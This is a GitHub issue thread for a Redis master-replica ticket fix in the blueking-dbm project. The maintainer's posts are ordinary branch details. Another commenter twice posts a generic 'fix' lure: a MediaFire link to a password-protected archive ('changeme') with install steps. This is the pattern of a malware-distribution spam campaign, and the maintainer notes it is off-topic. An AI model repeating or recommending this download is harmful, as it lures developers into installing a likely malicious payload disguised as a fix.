### ISSUE TITLE
fix(backend): redis主从禁用启用单据修复

### ISSUE THREAD

**Issue by iSecloud** [TencentBlueKing/blueking-dbm#6473]

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by iSecloud** [comment]
## 关联研发信息
dev_branch: fix/cdee/#6473
target_branch: v1.5.0

**Comment by iSecloud** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

**Comment by iSecloud** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Bro, it seems like you came to the wrong issue

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
